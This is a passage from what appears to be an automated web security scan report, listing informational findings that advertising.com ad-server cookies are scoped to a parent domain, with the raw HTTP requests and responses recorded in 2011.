Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1013955.776692.0XMC
Set-Cookie: F1=BkaHQ3EBAAAABAAAAsAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:33 GMT; path=/
Set-Cookie: BASE=x7Q9Hi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vP!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:33 GMT; path=/
Set-Cookie: ROLL=U6APJje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49A!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:33 GMT; path=/
Set-Cookie: 24692193=_4dd01da9,1681601282,776692^1013955^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:33 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 592

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N2465.AOLanywhere/B5391584.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum=00010139
...[SNIP]...

13.34. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=28905079/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=28905079/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=28905079/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=9432
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=E0B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; F1=BkRHQ3EBAAAABAAAAQAAgEA; BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kOPmTH!; ROLL=U6APGje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpO!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:37:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1007584.776692.0XMC
Set-Cookie: F1=BwWHQ3EBAAAABAAAAUAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:37:32 GMT; path=/
Set-Cookie: BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kWPmTH!; domain=advertising.com; expires=Tue, 14-May-2013 18:37:32 GMT; path=/
Set-Cookie: ROLL=U6APHje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+I!; domain=advertising.com; expires=Tue, 14-May-2013 18:37:32 GMT; path=/
Set-Cookie: 28905079=_4dd01d6c,7613878875,776692^1007584^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:37:32 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum
...[SNIP]...

13.35. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=36738221/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=36738221/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=36738221/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6506
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=A0B0NFJwIsb0F8QqHjQCiZEY; F1=BEQHQ3EBAAAABAAAAIAAgEA; BASE=x7Q9Ci23SwnkpMdYS8Ne5rO!; ROLL=U6APAje2uuEWubpKMml2fHG!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1007584.776692.0XMC
Set-Cookie: F1=BQQHQ3EBAAAABAAAAMAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:35:47 GMT; path=/
Set-Cookie: BASE=x7Q9Di23SwnkpMdYS8Ne5ruGfsaVK0B!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:47 GMT; path=/
Set-Cookie: ROLL=U6APBje2uuEWubpKMml2fH2WGhDmKrC!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:47 GMT; path=/
Set-Cookie: 36738221=_4dd01d04,1850234033,776692^1007584^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:47 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum
...[SNIP]...

13.36. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=37579081/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=37579081/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=37579081/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=forgot_password&t=8617
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=E0B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BQQHQ3EBAAAABAAAAMAAgEA; BASE=x7Q9Di23SwnkpMdYS8Ne5ru2BcaVK0B!; ROLL=U6APBje2uuEWubpKMml2fH2mYRDmKrC!; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:36:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1007584.776692.0XMC
Set-Cookie: F1=BkRHQ3EBAAAABAAAAQAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:36:09 GMT; path=/
Set-Cookie: BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kOPmTH!; domain=advertising.com; expires=Tue, 14-May-2013 18:36:09 GMT; path=/
Set-Cookie: ROLL=U6APGje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpO!; domain=advertising.com; expires=Tue, 14-May-2013 18:36:09 GMT; path=/
Set-Cookie: 37579081=_4dd01d19,3084744114,776692^1007584^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:36:09 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum
...[SNIP]...

13.37. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=42928792/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html%253Ftopic%253Dreport-abuse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=42928792/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html%253Ftopic%253Dreport-abuse

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=42928792/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html%253Ftopic%253Dreport-abuse HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=help&t=7950
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=o2B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BwaHQ3EBAAAABAAAAwAAgEA; BASE=x7Q9Ii23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqC!; ROLL=U6APOje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWF!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.972219.776692.0XMC
Set-Cookie: F1=B4aHQ3EBAAAABAAAA0AAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:39 GMT; path=/
Set-Cookie: BASE=x7Q9Ji23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTNH!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:39 GMT; path=/
Set-Cookie: ROLL=U6APPje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWluzNpOTwO!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:39 GMT; path=/
Set-Cookie: 42928792=_4dd01dae,3412827100,776692^972219^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:39 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1553

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE>&nbsp;</TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

13.38. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=44415793/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=44415793/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=44415793/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=terms_of_service&t=6042
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=s1B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BAaHQ3EBAAAABAAAAcAAgEA; BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kmPmTH!; ROLL=U6APFje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWJ!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1007584.776692.0XMC
Set-Cookie: F1=BIaHQ3EBAAAABAAAAgAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:26 GMT; path=/
Set-Cookie: BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTH!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:26 GMT; path=/
Set-Cookie: ROLL=U6APKje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt8K!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:26 GMT; path=/
Set-Cookie: 44415793=_4dd01da2,0160042632,776692^1007584^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum
...[SNIP]...

13.39. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=49573366/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fsafety.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=49573366/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fsafety.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=49573366/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fsafety.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=safety&t=250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=s1B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BIaHQ3EBAAAABAAAAgAAgEA; BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTH!; ROLL=U6APKje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt8K!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1008666.776692.0XMC
Set-Cookie: F1=BYaHQ3EBAAAABAAAAkAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:30 GMT; path=/
Set-Cookie: BASE=x7Q9Fi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwD!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:30 GMT; path=/
Set-Cookie: ROLL=U6APLje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU8M!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:30 GMT; path=/
Set-Cookie: 49573366=_4dd01da6,6001177635,776692^1008666^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:30 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 598

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N339.americaonline.com/B5422295.16;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum=00
...[SNIP]...

13.40. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=58838557/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=58838557/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=58838557/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=5598
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=A0B0NFJwIsb0F8QqHjQCiZEY; F1=BAQHQ3EBAAAABAAAAEAAgEA; BASE=x7Q9Bi23SwnkpMN!; ROLL=U6APDje2uuEWubJ!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.944423.776692.0XMC
Set-Cookie: F1=BEQHQ3EBAAAABAAAAIAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:35:45 GMT; path=/
Set-Cookie: BASE=x7Q9Ci23SwnkpMdYS8Ne5rO!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:45 GMT; path=/
Set-Cookie: ROLL=U6APAje2uuEWubpKMml2fHG!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:45 GMT; path=/
Set-Cookie: 58838557=_4dd01d01,6753824420,776692^944423^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:45 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1046

function AdClicked(url)
{
var clickLineDisabled = "$dcli";
if(clickLineDisabled=="1")
{
return;
}

var winOpen = "1";
if(winOpen == "1")
{
w
...[SNIP]...

13.41. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=68130074/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fbrowse.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=68130074/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fbrowse.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=68130074/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fbrowse.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=browse&t=5998
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
